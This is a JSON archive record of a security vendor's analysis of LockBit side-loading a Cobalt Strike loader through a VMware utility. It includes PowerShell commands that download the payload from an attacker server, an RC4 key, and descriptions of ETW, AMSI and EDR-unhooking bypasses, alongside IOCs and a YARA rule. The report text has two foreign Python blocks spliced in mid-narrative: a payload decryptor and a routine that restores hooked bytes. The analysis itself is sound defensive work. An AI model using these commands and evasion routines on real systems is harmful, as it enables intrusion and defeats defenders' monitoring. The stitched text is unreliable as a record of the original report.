{
	"id": "392c2436-c5f9-4514-8776-661d75aabdda",
	"created_at": "2026-04-06T00:17:20.650834Z",
	"updated_at": "2026-04-10T03:37:51.37615Z",
	"deleted_at": null,
	"sha1_hash": "275f377e78b3547467560b13fe13c85a79695841",
	"title": "LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9853050,
	"plain_text": "LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility\r\nBy James Haughom, Júlio Dantas, and Jim Walter\r\nPublished: 2022-04-27 · Archived: 2026-04-05 16:24:07 UTC\r\nExecutive Summary\r\nThe VMware command line utility VMwareXferlogs.exe, used for data transfer to and from VMX logs, is susceptible to DLL side-loading.\r\nDuring a recent investigation, our DFIR team discovered that LockBit Ransomware-as-a-Service (RaaS) side-loads Cobalt Strike Beacon through a signed VMware xfer logs command line utility.\r\nThe threat actor uses PowerShell to download the VMware xfer logs utility along with a malicious DLL and a .log file containing an RC4-encrypted Cobalt Strike Reflective Loader.\r\nThe malicious DLL evades defenses by removing EDR/EPP userland hooks and by bypassing both Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI).\r\nThere are suggestions (via vx-underground) that the side-loading functionality was implemented by an affiliate rather than by the LockBit developers themselves, likely DEV-0401.\r\nOverview\r\nLockBit is a Ransomware-as-a-Service (RaaS) operation that has been active since 2019 (previously known as “ABCD”). It commonly leverages the double extortion technique, employing tools such as StealBit, WinSCP, and cloud-based backup solutions for data exfiltration prior to deploying the ransomware. Like most ransomware groups, LockBit’s post-exploitation tool of choice is Cobalt Strike.\r\nDuring a recent investigation, our DFIR team discovered an interesting technique used by the LockBit ransomware group, or perhaps an affiliate, to load a Cobalt Strike Beacon Reflective Loader. In this particular case, LockBit managed to side-load Cobalt Strike Beacon through a signed VMware xfer logs command line utility.\r\nSince our initial publication of this report, we have identified a connection with an affiliate Microsoft tracks as DEV-0401. 
A switch to LockBit represents a notable departure from DEV-0401’s previously observed TTPs.\r\nSide-loading is a DLL-hijacking technique used to trick a benign process into loading and executing a malicious DLL by placing the DLL alongside the process’ corresponding EXE, taking advantage of the DLL search order (for a DLL that is not a KnownDLL, the directory of the executable is searched before the system directories). In this instance, the threat actor used PowerShell to download the VMware xfer logs utility along with a malicious DLL and a .log file containing an encrypted Cobalt Strike Reflective Loader. The VMware utility was then executed via cmd.exe, passing control flow to the malicious DLL.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 1 of 16\r\nThe DLL then proceeded to evade defenses by removing EDR/EPP userland hooks, as well as bypassing both Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI). The .log file was then loaded in memory and decrypted via RC4, revealing a Cobalt Strike Beacon Reflective Loader. 
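The decryption step above, and the RC4 key schedule and decryption routine shown later in this report, as an added example written for this page rather than code from the SentinelOne analysis: a standalone RC4 implementation that decrypts a payload container of the c0000015.log kind and triages the result (is it a PE image, and which strings does it expose). The key, the container bytes and the marker string are constructed assumptions so that the script runs offline; the real sample's 136-byte key and loader are not reproduced.

```python
# Added example (not code from the SentinelOne report): RC4-decrypt a payload
# container such as c0000015.log and check that the result is a PE image.
# The key and the container bytes below are constructed so the script runs
# offline; the real sample's 136-byte key is not reproduced here.
from typing import List


def rc4_ksa(key: bytes) -> List[int]:
    # Key-scheduling algorithm: permute the 256-entry state with the key bytes
    if not key:
        raise ValueError('RC4 key must not be empty')
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    # PRGA: derive the keystream from the scheduled state and XOR it into data.
    # RC4 is symmetric, so the same call encrypts and decrypts.
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def looks_like_pe(blob: bytes) -> bool:
    # DOS header magic, then follow e_lfanew (offset 0x3C) to the PE signature
    if len(blob) < 0x40 or blob[:2] != b'MZ':
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], 'little')
    return blob[e_lfanew:e_lfanew + 4] == b'PE' + bytes(2)


def printable_strings(blob: bytes, min_len: int = 8) -> List[str]:
    # Pull out ASCII runs, the quick way to spot a reflective loader's strings
    found, run = [], bytearray()
    for b in blob + bytes(1):          # trailing zero flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append(run.decode('ascii'))
            run = bytearray()
    return found


def decrypt_container(key: bytes, container: bytes) -> dict:
    # Decrypt and triage: is it a PE, and which strings does it expose?
    plain = rc4_crypt(key, container)
    return {'is_pe': looks_like_pe(plain), 'strings': printable_strings(plain), 'plain': plain}


# Constructed stand-ins (assumptions, not sample data): a 136-byte key and a
# minimal PE-shaped blob carrying a marker string where a loader would have its
# exports. 'ReflectiveLoader' is a common reflective-DLL export name, not a
# claim about this sample's strings.
SAMPLE_KEY = bytes(range(1, 137))


def build_fake_loader() -> bytes:
    header = bytearray(0x84)
    header[0:2] = b'MZ'
    header[0x3C:0x40] = (0x80).to_bytes(4, 'little')
    header[0x80:0x84] = b'PE' + bytes(2)
    return bytes(header) + b'ReflectiveLoader' + bytes(4) + b'constructed beacon stand-in'


SAMPLE_CONTAINER = rc4_crypt(SAMPLE_KEY, build_fake_loader())   # what the .log would hold

if __name__ == '__main__':
    result = decrypt_container(SAMPLE_KEY, SAMPLE_CONTAINER)
    print('PE image:', result['is_pe'])
    for s in result['strings']:
        print('  string:', s)
```

To use this against a real container, replace SAMPLE_KEY with the key recovered from the DLL's key-scheduling routine and read the .log file's bytes into the container argument; a wrong key produces no MZ/PE structure, which is the first sanity check before looking for loader strings.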
Lastly, a user-mode Asynchronous Procedure Call (APC) is queued, which is used to pass control flow to the decrypted Beacon.\r\nAttack Chain\r\nThe attack chain began with several PowerShell commands executed by the threat actor to download three components: a malicious DLL, a signed VMwareXferlogs executable, and an encrypted Cobalt Strike payload in the form of a .log file.\r\nFilename - Description\r\nglib-2.0.dll - Weaponized DLL loaded by VMwareXferlogs.exe\r\nVMwareXferlogs.exe - Legitimate, signed VMware command line utility\r\nc0000015.log - Encrypted Cobalt Strike payload\r\nOur DFIR team recovered the complete PowerShell commands used to download the components from forensic artifacts.\r\nInvoke-WebRequest -uri hxxp://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\\windows\\debug\\glib-2.0.dll\r\nInvoke-WebRequest -uri hxxp://45.32.108[.]54:443/c0000015.log -OutFile c:\\windows\\debug\\c0000015.log\r\nInvoke-WebRequest -uri hxxp://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile c:\\windows\\debug\\VMwareX\r\nNote that all three downloads use plain HTTP on port 443 and are written to c:\\windows\\debug, which is not a location where VMware binaries are normally installed; both are useful hunting signals.\r\nThe downloaded binary (VMwareXferlogs.exe) was then executed via the command prompt, with STDOUT and STDERR redirected to a file on the local ADMIN$ share:\r\nc:\\windows\\debug\\VMwareXferlogs.exe 1> \\\\127.0.0.1\\ADMIN$\\__1649832485.0836577 2>&1\r\nThe redirect target, a file named __ followed by a Unix timestamp on \\\\127.0.0.1\\ADMIN$, is the output-capture convention of Impacket’s wmiexec.py (and related Impacket exec scripts), so the launch is consistent with remote execution rather than an interactive session.\r\nVMwareXferlogs.exe is a legitimate, signed executable belonging to VMware.\r\nVirusTotal signature summary for VMwareXferlogs.exe\r\nThis utility is used to transfer data to and from VMX logs.\r\nVMware xfer utility command line usage\r\nThis command line utility makes several calls to a third-party library called glib-2.0.dll. 
Both the utility and a legitimate version of glib-2.0.dll are shipped with VMware installations.\r\nglib-2.0.dll functions imported by VMwareXferlogs.exe\r\nThe weaponized glib-2.0.dll downloaded by the threat actor exports all of the functions that VMwareXferlogs.exe imports, so the loader resolves every import and the process starts normally.\r\nExported functions of the malicious glib-2.0.dll\r\nCalls to exported functions from glib-2.0.dll are made within the main function of the VMware utility, the first being g_path_get_basename().\r\nglib-2.0.dll functions being called by VMwareXferlogs.exe\r\nNote that the virtual addresses of the exported functions are all the same in the weaponized glib-2.0.dll (0x1800020d0), except for g_path_get_basename, which has a virtual address of 0x180002420. This is because every export other than g_path_get_basename does nothing but call ExitProcess(); those exports exist only to satisfy import resolution. This shared export address is also the property the YARA rule at the end of this report keys on.\r\ng_error_free() function’s logic\r\ng_path_get_basename(), on the other hand, invokes the malicious payload prior to exiting. Because it is the first glib export that main() calls, control flow is transferred to the malicious glib-2.0.dll rather than the legitimate one as soon as the utility starts, completing the side-loading attack.\r\ng_path_get_basename() being called in the main() function\r\nOnce control flow is passed to the weaponized DLL, the presence of a debugger is checked by querying the BeingDebugged flag and NtGlobalFlag in the Process Environment Block (PEB). 
If a debugger is detected, the malware enters an endless loop.\r\nAnti-debug mechanisms\r\nBypassing EDR/EPP Userland Hooks\r\nAt this juncture, the malware enters a routine to bypass any userland hooks: it manually maps a fresh copy of its own image into memory, performs a byte-by-byte comparison between that clean copy and the loaded module, and overwrites any sections that differ with the bytes from the clean copy.\r\nThis routine is repeated for every loaded module, which allows the malware to identify any userland hooks installed by EDR/EPP and overwrite them with the unpatched/unhooked code taken directly from the modules’ images on disk.\r\nChecking for discrepancies between on-disk and in-memory code for each loaded module\r\nFor example, an EDR’s userland NT-layer hooks may be removed with this technique. The subroutine below shows a trampoline where a SYSCALL stub would typically reside; instead it jumps into a DLL injected by the EDR. This subroutine is overwritten/restored to remove the hook.\r\nEDR-hooked SYSCALL stub that will be patched\r\nHere is a look at the patched code, with the original SYSCALL stub restored and the EDR hook removed.\r\nNT-layer hook removed and original code restored\r\nOnce these hooks are removed, the malware continues to evade defenses. Next, it attempts to bypass Event Tracing for Windows (ETW) by patching the EtwEventWrite API with a RET instruction (0xC3), so that every call returns immediately and no useful ETW telemetry is generated by this process. Note that this only silences user-mode ETW providers inside the patched process; telemetry produced from kernel mode (kernel-mode ETW providers and kernel callbacks) is unaffected.\r\nEvent Tracing for Windows bypass\r\nAMSI is bypassed in the same way as ETW, by patching AmsiScanBuffer. 
Patching AmsiScanBuffer halts AMSI from inspecting potentially suspicious buffers within this process.\r\nAMSI bypass\r\nOnce these defenses have been bypassed, the malware proceeds to execute the final payload. The final payload is a Cobalt Strike Beacon Reflective Loader that is stored RC4-encrypted in the previously mentioned c0000015.log file. The RC4 Key Scheduling Algorithm can be seen below with the hardcoded 136-byte key (as rendered in the screenshot):\r\n\u0026.5 \\C3%YHO2SM-\u0026B3!XSY6SV)6(\u00267;(3.'\r\n$F2WAED\u003e\u003e;K]8\\*D\r\nHERIP:45:X(WN8[?3Y\u003eXCWNPOL89\u003e[.# Q'\r\n4CP8M-%4N[7.$R-\u003e-1)$!NU\"W$!YT\u003cJ$V[\r\nRC4 Key Scheduling Algorithm\r\nThe RC4 decryption of the payload then commences.\r\nRC4 decryption routine\r\nThe final result is Beacon’s Reflective Loader, seen below with the familiar magic bytes and hardcoded strings.\r\nDecrypted Cobalt Strike Beacon Reflective Loader\r\nOnce decrypted, the region of memory in which the payload resides is made executable (PAGE_EXECUTE_READWRITE), and a new thread is created for the payload to run in.\r\nThis thread is created in a suspended state, allowing the malware to queue a user-mode APC pointing to the payload on the newly created thread’s APC queue. 
Finally, the thread is resumed, the queued APC fires, and the Cobalt Strike payload executes in the new thread.\r\nLogic to queue and execute the user-mode APC\r\nThe DLL is detected by the SentinelOne agent prior to being loaded and executed.\r\nDetection for LockBit DLL\r\nVMware Side-loading Variants\r\nA handful of samples related to the malicious DLL were discovered by our investigation. The only notable differences are the RC4 key and the name of the file containing the RC4-encrypted payload to decrypt.\r\nFor example, several of the samples attempt to load the file vmtools.ini rather than c0000015.log.\r\nThe vmtools.ini file being accessed by a variant\r\nAnother variant loads the same file name, vmtools.ini, yet is packed with a custom version of UPX.\r\nTail jump at the end of the UPX unpacking stub\r\nConclusion\r\nThe VMware command line utility VMwareXferlogs.exe, used for data transfer to and from VMX logs, is susceptible to DLL side-loading. In our engagement, we saw that the threat actor had created a malicious version of the legitimate glib-2.0.dll with code only in the g_path_get_basename() function, while all other exports simply called ExitProcess(). This function invokes a malicious payload which, among other things, attempts to bypass EDR/EPP userland hooks and engages in anti-debugging logic.\r\nLockBit continues to be a successful RaaS, and the developers are clearly innovating in response to EDR/EPP solutions. 
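The unhooking routine, the EtwEventWrite RET patch and the AmsiScanBuffer patch described above all leave the same trace: bytes in a loaded module that no longer match the module's image on disk. As an added example written for this page (not part of the SentinelOne analysis), the following Python performs that comparison from the defender's side: it diffs a function's clean bytes against its live bytes, coalesces the differences into runs, names the patch shape (a RET stamped on the entry, a JMP rel32 trampoline, or some other modification) and resolves where a trampoline jumps. It also shows the restore step the loader itself performs. All module bases, syscall numbers and function prologues below are constructed stand-ins, not bytes taken from real ntdll.dll or amsi.dll; obtaining clean and live bytes from a real process is left to the reader's tooling.

```python
# Added example (not code from the SentinelOne report): a defender-side
# integrity check that mirrors the loader's own unhooking trick in reverse.
# Everything below is constructed: module bases, the syscall number and the
# function prologues are schematic stand-ins, not bytes from real modules.
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Patch:
    module: str
    function: str
    offset: int                   # offset into the function where bytes differ
    clean: bytes                  # bytes the on-disk image has there
    live: bytes                   # bytes the process has there
    kind: str                     # 'ret_patch', 'jmp_trampoline' or 'modified'
    target: Optional[int] = None  # resolved JMP destination for a trampoline


def diff_regions(clean: bytes, live: bytes) -> List[Tuple[int, int]]:
    # Coalesce differing byte positions into half-open (start, end) runs
    if len(clean) != len(live):
        raise ValueError('image size mismatch')
    regions, start = [], None
    for i, (a, b) in enumerate(zip(clean, live)):
        if a != b and start is None:
            start = i
        elif a == b and start is not None:
            regions.append((start, i))
            start = None
    if start is not None:
        regions.append((start, len(clean)))
    return regions


def classify(live: bytes, offset: int, base: int) -> Tuple[str, Optional[int]]:
    # 0xC3 at the patch start is a RET patch (the ETW/AMSI bypass shape);
    # 0xE9 + rel32 is a relative jump landing at base + offset + 5 + rel
    first = live[offset]
    if first == 0xC3:
        return 'ret_patch', None
    if first == 0xE9 and offset + 5 <= len(live):
        rel = int.from_bytes(live[offset + 1:offset + 5], 'little', signed=True)
        return 'jmp_trampoline', base + offset + 5 + rel
    return 'modified', None


def scan_function(module: str, function: str, base: int,
                  clean: bytes, live: bytes) -> List[Patch]:
    # base: virtual address of the function in the live process
    found = []
    for start, end in diff_regions(clean, live):
        kind, target = classify(live, start, base)
        found.append(Patch(module, function, start, clean[start:end],
                           live[start:end], kind, target))
    return found


def restore(clean: bytes, live: bytes) -> bytes:
    # The loader's unhooking step: copy the clean bytes over every differing run
    patched = bytearray(live)
    for start, end in diff_regions(clean, live):
        patched[start:end] = clean[start:end]
    return bytes(patched)


# Constructed samples. NT_CLEAN is a schematic x64 syscall stub
# (mov r10,rcx; mov eax,0x18; syscall; ret) whose first five bytes an EDR hook
# replaces with jmp rel32. ETW_CLEAN and AMSI_CLEAN are generic prologues.
NT_BASE, ETW_BASE, AMSI_BASE = 0x7FFD00001000, 0x7FFD00002000, 0x7FFD00003000
NT_CLEAN = bytes.fromhex('4c8bd1b8180000000f05c3')
NT_HOOKED = bytes.fromhex('e900010000') + NT_CLEAN[5:]
ETW_CLEAN = bytes.fromhex('48895c2408488974241048897c2418')
ETW_PATCHED = bytes([0xC3]) + ETW_CLEAN[1:]
AMSI_CLEAN = bytes.fromhex('4c8bdc49895b0849896b104989731857')
# mov eax,0x80070057 (E_INVALIDARG); ret spliced in just past the prologue
AMSI_PATCHED = AMSI_CLEAN[:7] + bytes.fromhex('b857000780c3') + AMSI_CLEAN[13:]


def scan_all() -> List[Patch]:
    return (scan_function('ntdll.dll', 'NtAllocateVirtualMemory', NT_BASE, NT_CLEAN, NT_HOOKED)
            + scan_function('ntdll.dll', 'EtwEventWrite', ETW_BASE, ETW_CLEAN, ETW_PATCHED)
            + scan_function('amsi.dll', 'AmsiScanBuffer', AMSI_BASE, AMSI_CLEAN, AMSI_PATCHED))


if __name__ == '__main__':
    for p in scan_all():
        where = (' -> 0x%x' % p.target) if p.target is not None else ''
        print('%s!%s+0x%x %s: %s became %s%s' % (
            p.module, p.function, p.offset, p.kind, p.clean.hex(), p.live.hex(), where))
```

The design choice worth noting is that the check is byte-level and signature-free, which is exactly why the loader's own version of it finds every inline hook regardless of which EDR placed it; run from the defender's side, the same diff surfaces the loader's RET patches on EtwEventWrite and AmsiScanBuffer. A trampoline whose resolved target lies outside any known module mapping is the usual follow-up question for a hooked syscall stub.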
We hope that by describing this latest technique, defenders and security teams will be able to improve their ability to protect their organizations.\r\nIndicators of Compromise\r\nSHA1 - Description\r\n729eb505c36c08860c4408db7be85d707bdcbf1b - Malicious glib-2.0.dll from investigation\r\n091b490500b5f827cc8cde41c9a7f68174d11302 - Decrypted Cobalt Strike payload\r\ne35a702db47cb11337f523933acd3bce2f60346d - Encrypted Cobalt Strike payload (c0000015.log)\r\n25fbfa37d5a01a97c4ad3f0ee0396f953ca51223 - glib-2.0.dll vmtools.ini variant\r\n0c842d6e627152637f33ba86861d74f358a85e1f - glib-2.0.dll vmtools.ini variant\r\n1458421f0a4fe3acc72a1246b80336dc4138dd4b - glib-2.0.dll UPX-packed vmtools.ini variant\r\nFile Path - Description\r\nc:\\windows\\debug\\VMwareXferlogs.exe - Full path to the legitimate VMware command line utility\r\nc:\\windows\\debug\\glib-2.0.dll - Malicious DLL used for the hijack\r\nc:\\windows\\debug\\c0000015.log - Encrypted Cobalt Strike reflective loader\r\nC2 - Description\r\n149.28.137[.]7 - Cobalt Strike C2\r\n45.32.108[.]54 - Attacker C2 (staging server for the three downloads)\r\nYARA Hunting Rules\r\nimport \"pe\"\r\nrule Weaponized_glib2_0_dll\r\n{\r\n    meta:\r\n        description = \"Identify potentially malicious versions of glib-2.0.dll\"\r\n        author = \"James Haughom @ SentinelOne\"\r\n        date = \"2022-04-22\"\r\n        reference = \"https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\"\r\n    condition:\r\n        // unsigned DLL that exports the glib functions VMwareXferlogs.exe imports\r\n        pe.characteristics & pe.DLL and pe.number_of_signatures == 0 and\r\n        pe.exports(\"g_path_get_basename\") and\r\n        pe.exports(\"g_error_free\") and\r\n        pe.exports(\"g_free\") and\r\n        pe.exports(\"g_option_context_add_main_entries\") and\r\n        pe.exports(\"g_option_context_get_help\") and\r\n        pe.exports(\"g_option_context_new\") 
and\r\n        pe.exports(\"g_print\") and\r\n        pe.exports(\"g_printerr\") and\r\n        pe.exports(\"g_set_prgname\") and\r\n        pe.exports(\"g_option_context_free\") and\r\n        pe.exports(\"g_option_context_parse\") and\r\n        // every stub export resolves to the same code (it only calls ExitProcess),\r\n        // while g_path_get_basename, which carries the payload, points elsewhere\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_error_free\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_option_context_add_main_entries\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_option_context_get_help\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_option_context_new\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_print\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_printerr\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_set_prgname\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_option_context_free\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_index(\"g_option_context_parse\")].offset and\r\n        pe.export_details[pe.exports_index(\"g_free\")].offset != pe.export_details[pe.exports_index(\"g_path_get_basename\")].offset and\r\n        pe.number_of_exports < 15\r\n}\r\nMITRE ATT&CK TTPs\r\nTTP - MITRE ID\r\nEncrypted Cobalt Strike payload - T1027\r\nDLL side-loading - T1574.002\r\nETW bypass (patching EtwEventWrite) - T1562.006\r\nAMSI bypass (patching AmsiScanBuffer) - T1562.001\r\nUnhooking EDR - T1562.001\r\nUPX-packed variant (software packing) - T1027.002\r\nPowerShell usage - T1059.001\r\nCobalt Strike - S0154\r\nSource: https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/"
	],
	"report_names": [
		"lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f63c346d-18c8-4821-a56d-fefb1ad7ed5d",
			"created_at": "2022-10-25T16:07:23.42507Z",
			"updated_at": "2026-04-10T02:00:04.593122Z",
			"deleted_at": null,
			"main_name": "Bronze Starlight",
			"aliases": [
				"Cinnamon Tempest",
				"DEV-0401",
				"HighGround",
				"Operation ChattyGoblin",
				"SLIME34"
			],
			"source_name": "ETDA:Bronze Starlight",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"AtomSilo",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"HUI Loader",
				"Kaba",
				"Korplug",
				"LockFile",
				"Night Sky",
				"NightSky",
				"Pandora",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c69bcda3-0893-4ea1-9ec1-ae016332d283",
			"created_at": "2023-01-06T13:46:39.410593Z",
			"updated_at": "2026-04-10T02:00:03.317754Z",
			"deleted_at": null,
			"main_name": "BRONZE STARLIGHT",
			"aliases": [
				"DEV-0401",
				"Cinnamon Tempest",
				"Emperor Dragonfly",
				"SLIME34"
			],
			"source_name": "MISPGALAXY:BRONZE STARLIGHT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d511e74b-96b8-4ab9-88d6-bc183351dbd8",
			"created_at": "2025-08-07T02:03:24.674685Z",
			"updated_at": "2026-04-10T02:00:03.800936Z",
			"deleted_at": null,
			"main_name": "BRONZE STARLIGHT",
			"aliases": [
				"Cinnamon Tempest ",
				"DEV-0401 ",
				"Emperor Dragonfly "
			],
			"source_name": "Secureworks:BRONZE STARLIGHT",
			"tools": [
				"AtomSilo",
				"Cobalt Strike",
				"HUI Loader",
				"Impacket",
				"LockFile",
				"NightSky",
				"Pandora",
				"PlugX",
				"Rook"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "81e29474-63ad-4ce8-97db-b1712d5481d5",
			"created_at": "2024-04-24T02:00:49.570158Z",
			"updated_at": "2026-04-10T02:00:05.285111Z",
			"deleted_at": null,
			"main_name": "Cinnamon Tempest",
			"aliases": [
				"Cinnamon Tempest",
				"DEV-0401",
				"Emperor Dragonfly",
				"BRONZE STARLIGHT"
			],
			"source_name": "MITRE:Cinnamon Tempest",
			"tools": [
				"Pandora",
				"PlugX",
				"Cheerscrypt",
				"Impacket",
				"Cobalt Strike",
				"HUI Loader",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434640,
	"ts_updated_at": 1775792271,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/275f377e78b3547467560b13fe13c85a79695841.pdf",
		"text": "https://archive.orkl.eu/275f377e78b3547467560b13fe13c85a79695841.txt",
		"img": "https://archive.orkl.eu/275f377e78b3547467560b13fe13c85a79695841.jpg"
	}
}